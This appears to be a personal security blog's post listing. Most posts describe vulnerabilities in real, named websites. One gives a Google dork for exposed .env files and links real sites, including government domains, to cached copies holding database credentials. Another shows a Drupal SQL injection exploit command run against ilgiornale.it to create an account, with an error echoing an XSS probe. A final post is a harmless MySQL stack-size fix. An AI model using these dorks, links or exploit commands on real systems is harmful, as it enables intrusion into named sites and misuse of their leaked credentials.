Skip to main content

Posts

http://securityaffairs.co |

with WordPress version 4.0.13

http://securityaffairs.co/wordpress/wp-content/debug.logwas full of debug informations. I didn't save it.WP_query SQL Injection Update: site fixed and updated
Recent posts

Dockers and Laravel (etc) .env Google Dork

Google Dork: "DB_PASSWORD" filetype:env

samples

www.nicn.gov.ng/funds/.env
... DB_USERNAME=sanfas93_funds ... Cache http://webcache.googleusercontent.com/search?q=cache:MpIEuXgh8g0J:www.nicn.gov.ng/funds/.env+&cd=1&hl=it&ct=clnk&gl=ithttp://archive.is/QAPCNhttp://webcache.googleusercontent.com/search?q=cache:CTsy_8EgUX0J:www.snapnet.com.ng/support/.env+&cd=2&hl=it&ct=clnk&gl=ithttp://archive.is/eSLW6http://lightscameraafrica.com/shared/.envhttp://archive.is/nzYvlhttp://www.energycom.gov.gh/cewp/.envhttp://archive.is/DNAlmhttp://www.ltleadership.org/test/.envhttp://archive.is/tOa6p

http://www.ilgiornale.it/ | sql injection, account creation

Drupal
sql injection and account creation
python 34992 -t http://www.ilgiornale.it/ -u dop -p dop

We can  raise an error to have more info






Drupal

PDOException: SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'field_cap_value' at row 1: INSERT INTO {field_data_field_cap} (entity_type, entity_id, revision_id, bundle, delta, language, field_cap_value, field_cap_format) VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5, :db_insert_placeholder_6, :db_insert_placeholder_7); Array ( [:db_insert_placeholder_0] => user [:db_insert_placeholder_1] => 140122 [:db_insert_placeholder_2] => 140122 [:db_insert_placeholder_3] => user [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => "><script>alert(1);</script><" [:db_ins…

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7

How to fix Thread stack overrun with mysql 5.7 (and other versions)
Thread stack overrun with mysql 5.7 on Linux and Windows Run the server with
mysqld --thread_stack=256k
to configure my.ini/my.cnf (server.cnf) add:

thread_stack = 256K


Further problems with mysql on windows On 64 bit (windows) probably you will need to give a bigger value
I've been forced to use
thread_stack = 512K on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL))






Generic errors with mysql_upgrade
ERROR 1436 (HY000) at line 1879: Thread stack overrun
ERROR 1436 (HY000) at line 1935

Use 'mysqld --thread_stack=#' to specify a bigger stack